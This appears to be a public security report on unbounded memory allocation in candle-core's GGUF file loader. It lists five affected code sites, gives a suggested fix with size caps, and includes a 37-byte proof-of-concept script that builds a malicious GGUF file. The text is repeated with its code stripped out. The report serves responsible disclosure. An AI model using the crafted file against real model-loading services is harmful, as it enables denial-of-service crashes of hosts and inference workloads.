Filing this publicly because the repo does not currently have Private Vulnerability Reporting enabled. Happy to move to a private channel if preferred — please enable PVR on the repo and let me know.
Summary
candle-core/src/quantized/gguf_file.rs (current main, commit 24b0b28+) reads several length / count fields from a GGUF file as u32/u64 and uses them directly as the size argument of vec![T; n], Vec::with_capacity(n), and for _ in 0..n loops with no upper-bound check. A small (< 64-byte) GGUF file that declares 2^32 items drives the loader into multi-GB allocation or extremely long iteration, killing the host or its inference workload.
Same bug class as CVE-2025-66960 (ollama fs/ggml/gguf.go, fixed). In candle, the same pattern recurs across five sites. The sibling crate safetensors in the same org explicitly caps with MAX_HEADER_SIZE + buffer.get slicing — candle's GGUF loader did not adopt that pattern.
Affected sites
All in candle-core/src/quantized/gguf_file.rs:
(a) L99 — read_string length buffer:
let len = match magic {
VersionedMagic::GgufV1 => reader.read_u32::<LittleEndian>()? as usize,
VersionedMagic::GgufV2 | VersionedMagic::GgufV3 => {
reader.read_u64::<LittleEndian>()? as usize
}
};
let mut v = vec![0u8; len]; // <-- immediate physical alloc of `len` bytes
reader.read_exact(&mut v)?;
vec![0u8; len] is a committed allocation, not a virtual reservation. len = 2^32 → 4 GB RSS immediately.
(b) L306 — Value::read ARRAY branch:
let len = match magic { ... };
let mut vs = Vec::with_capacity(len);
for _ in 0..len {
vs.push(Value::read(reader, value_type, magic)?)
}
(c) L421 — tensor_count outer loop:
let tensor_count = ... reader.read_u64::<LittleEndian>()? as usize;
for _idx in 0..tensor_count {
let tensor_name = read_string(reader, &magic)?;
...
}
(d) L413 — metadata_kv_count: Same shape as (c).
(e) L427 / L432 — tensor dimensions vector:
let n_dimensions = reader.read_u32::<LittleEndian>()?;
let mut dimensions = vec![0; n_dimensions as usize]; // <-- alloc
reader.read_u32_into::<LittleEndian>(&mut dimensions)?;
Vec<usize> so 8 bytes/element. n_dimensions = 2^32 − 1 → ~32 GB immediate alloc.
Reachability
gguf_file::Content::read is the canonical entry for loading any GGUF model. Any application that loads a user-supplied or hub-downloaded GGUF traverses these sites.
Minimal PoC — 37 bytes
import struct
malicious = (
b'GGUF'
+ struct.pack('<I', 3)
+ struct.pack('<Q', 1) # tensor_count = 1
+ struct.pack('<Q', 0) # kv_count = 0
+ struct.pack('<Q', 1) + b't' # name = 't'
+ struct.pack('<I', 0xFFFFFFFF) # n_dimensions = 2^32 - 1
)
open('/tmp/evil.gguf', 'wb').write(malicious)
use candle_core::quantized::gguf_file;
use std::fs::File;
let mut f = File::open("/tmp/evil.gguf").unwrap();
let _ = gguf_file::Content::read(&mut f);
// attempts vec![0; (2^32-1)] (Vec<usize>) = ~32 GB
Suggested fix
Mirror the safetensors pattern. Define caps and gate each allocation:
const GGUF_MAX_ARRAY_ELEMENTS: usize = 1 << 30;
const GGUF_MAX_STRING_LENGTH: usize = 1 << 26;
const GGUF_MAX_TENSOR_DIMS: usize = 8;
fn read_string<R: Read>(reader: &mut R, magic: &VersionedMagic) -> Result<String> {
let len = ...;
if len > GGUF_MAX_STRING_LENGTH {
crate::bail!("GGUF string length {len} exceeds max {GGUF_MAX_STRING_LENGTH}")
}
let mut v = vec![0u8; len];
reader.read_exact(&mut v)?;
...
}
Equivalent gates at L306, L413, L421, L427. The C++ baseline ggml/src/gguf.cpp enforces the same caps after PR ggml-org/llama.cpp#19856.
Regression tests should cover each site with an oversized value and assert that the parser returns Err (not OOM).
CWE
- CWE-770 (Allocation of Resources Without Limits or Throttling)
- CWE-1284 (Improper Validation of Specified Quantity in Input)
- CWE-400 (Uncontrolled Resource Consumption)
CVE
If a CVE assignment is in scope here, happy to coordinate.
Filing this publicly because the repo does not currently have Private Vulnerability Reporting enabled. Happy to move to a private channel if preferred — please enable PVR on the repo and let me know.
Summary
candle-core/src/quantized/gguf_file.rs(currentmain, commit24b0b28+) reads several length / count fields from a GGUF file asu32/u64and uses them directly as the size argument ofvec![T; n],Vec::with_capacity(n), andfor _ in 0..nloops with no upper-bound check. A small (< 64-byte) GGUF file that declares2^32items drives the loader into multi-GB allocation or extremely long iteration, killing the host or its inference workload.Same bug class as CVE-2025-66960 (ollama
fs/ggml/gguf.go, fixed). In candle, the same pattern recurs across five sites. The sibling cratesafetensorsin the same org explicitly caps withMAX_HEADER_SIZE+buffer.getslicing — candle's GGUF loader did not adopt that pattern.Affected sites
All in
candle-core/src/quantized/gguf_file.rs:(a) L99 —
read_stringlength buffer:vec![0u8; len]is a committed allocation, not a virtual reservation.len = 2^32 → 4 GB RSS immediately.(b) L306 —
Value::readARRAY branch:(c) L421 —
tensor_countouter loop:(d) L413 —
metadata_kv_count: Same shape as (c).(e) L427 / L432 — tensor dimensions vector:
Vec<usize>so 8 bytes/element.n_dimensions = 2^32 − 1 → ~32 GBimmediate alloc.Reachability
gguf_file::Content::readis the canonical entry for loading any GGUF model. Any application that loads a user-supplied or hub-downloaded GGUF traverses these sites.Minimal PoC — 37 bytes
Suggested fix
Mirror the
safetensorspattern. Define caps and gate each allocation:Equivalent gates at L306, L413, L421, L427. The C++ baseline
ggml/src/gguf.cppenforces the same caps after PR ggml-org/llama.cpp#19856.Regression tests should cover each site with an oversized value and assert that the parser returns
Err(not OOM).CWE
CVE
If a CVE assignment is in scope here, happy to coordinate.